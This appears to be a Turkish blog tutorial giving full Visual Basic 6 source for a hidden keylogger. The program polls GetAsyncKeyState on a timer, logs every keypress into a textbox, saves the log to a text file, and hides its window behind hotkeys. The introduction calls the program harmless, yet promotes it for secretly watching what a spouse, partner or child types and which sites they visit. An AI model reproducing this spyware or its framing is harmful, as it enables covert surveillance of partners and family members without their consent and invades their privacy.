Visual Basic – Klavyeye Basılan Tuşları Gösterme

Merhaba Programlama dersleri Takipcileri Sizlere Bugun Pcde Pcnizde Basılan Her Tuşu kaydeden Zararsız Yazılım yapacagız.

Ne işe Yarar?

 

– Eşiniz, Sevgiliniz, Kocanız ,Çocugunuz Bilgisayarda Ne Yapıyor Hangi Oyunları oynuyor Nereleri Ziyaret Ediyor.

-işyerindeki Pcnizi İzinsiz Ziyaret Edenlermi Var?

Ve Mantıklı kulandıgınız Taktirde Bir Çok İşi Yarayabilecekbir Program Olacak Diyebilirim Sayın Program dersleri Okurları

Başlayalım Ozaman

———————————————————————–

İlk Önce Formumuza Bir Textbox ‘Multiline True Olacak
Sonra Timer Ekleyelim ‘Interval = 50 olsun
Ve Birde Commondialog Ekleyin ‘ Adını Cmd1 Yapın

Menü Oluşturun
Caption – Name
Aç – ac
Kaydet – ky
Gizle – gzle
Temizle – tmz
Kısayol Tuşlar – ksyı
Çıkış – cks

 

Kısayol Tuşları =
Ctrl + Alt + P Gizle
Ctrl + Alt + G Göster

Ve Kodlar:

Option Explicit 'Hiç Declare edilmemiş değişken varmı diye kontrol etmesi için kod
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
'İlk Önce Apiyi Declare Ettik Hangi Tuşa Bastığımızı Anlaması İçin

Private Sub ac_Click() ' Aç Menüsü
Dim yazı As String 'Yazı yı String Yaptık
Dim x As String 'X De String
On Error GoTo hatabulundu ' Hata Olduğunda Hatabulundu Etiketine Git
x = MsgBox("Kaydetmek İstermisiniz?", vbInformation + vbYesNo, "Çıkış") 'Kaydetmek İstediğini Sor
If x = vbYes Then 'Eğer Cevap Evet İse
ky_Click 'Kaydet Menüsüne Tıkla
Else 'Değilse
Text1.Text = "" 'Text1in İçindekini Sil
Cmd1.Filter = "Yazı Dosyası (*.txt)|*.txt" 'Dosyaları Filtrele Sadece txt Dosyası
Cmd1.FilterIndex = 0 '1.Filtreyi Seç
Cmd1.ShowOpen 'Aç
Open Cmd1.FileName For Input As #1 'Cmd deki İsimli dosyayı Aç
Do Until EOF(1) 'Satır 1 Olana Kadar Tekrarla
Input #1, yazı 'Ve Hersatırdaki Yazıyı Yazı değişkenine ata
Text1.Text = Text1.Text + yazı + vbCrLf 've onuda texte ata
Loop 'Döngüyü Bitir
Close #1 'Kapat
End If
Exit Sub
hatabulundu: 'Etiket
MsgBox "Hata!Hata Adı : " & Err.Description, vbCritical, "Hata!" 'Hata Ver
End Sub

Private Sub cks_Click() 'Çıkış Menüsü
Dim x As String
x = MsgBox("Kaydetmek İstermisiniz?", vbInformation + vbYesNo, "Çıkış") 'Kaydetmek İstiyormusunuz Diye Sor
If x = vbYes Then 'Cevap Evet İse
ky_Click 'Kaydet Menüsüne Tıkla
Else 'Değilse
End 'Çık
End If
End Sub

Private Sub Form_Resize() 'Form Boyutlandırıldığında
Text1.Left = 0 'Text1in left i 0
Text1.Top = 0 'Topda 0 Yani Başta
Text1.Width = Me.ScaleWidth 'Uzunluğu Formun Uzunlğuna Eşitle
Text1.Height = Me.ScaleHeight 'Genişliğide
End Sub

Private Sub gzle_Click() 'Gizleye Tıkladığında
Me.Hide 'Formu Gizle
End Sub

Private Sub ksy_Click() 'Kısayol Tuşlarına Tıklandığında
MsgBox "Ctrl + Alt + P = Gizle" & vbCrLf & "Ctrl + Alt + G = Göster", vbInformation, "Kısayol Tuşları" 'Kısayol Tuşlarını Yaz
End Sub

Private Sub ky_Click()
On Error GoTo hatabulundu 'Hata Olunca hatabulundu etiketine git
Cmd1.Filter = "Yazı Dosyası (*.txt)|*.txt" 'Filtrele
Cmd1.FilterIndex = 0 'İlk i Seç
Cmd1.ShowSave 'Kaydet
Open Cmd1.FileName For Output As #1 'O isimli bir dosya oluştur
Print #1, Text1.Text 'İçine text1 dekileri yaz
Close #1 'Kapat
Exit Sub
hatabulundu: 'Etiket
MsgBox "Hata!Hata Adı : " & Err.Description, vbCritical, "Hata!"
End Sub

Private Sub Timer1_Timer()
Dim i As Long
If GetAsyncKeyState(17) And GetAsyncKeyState(18) And GetAsyncKeyState(71) Then Me.Show
If GetAsyncKeyState(17) And GetAsyncKeyState(18) And GetAsyncKeyState(80) Then Me.Hide
'Ctrl Alt G Ye Bastığında göster Ctrl Alt P Ye Bastığında Gizle
For i = 5 To 200 'İ yi 5 den 200e kadar tekrarla
If GetAsyncKeyState(i) <> 0 Then 'Basılan tuşun kodu 5 ile 200 arasında ise
Text1.Text = Text1.Text & Chr(i) 'Basılan tuşu Texte Yaz
End If
Next
End Sub

Private Sub tmz_Click() 'Temizleye Tıkladığında
Text1.Text = "" 'Textdeki Yazıları Sil
End Sub

 

Kodları Yukarıdaki Gibi Ayarlıyoruz Programız Tamadır Güle Güle Kulanınız.

Bir yanıt yazın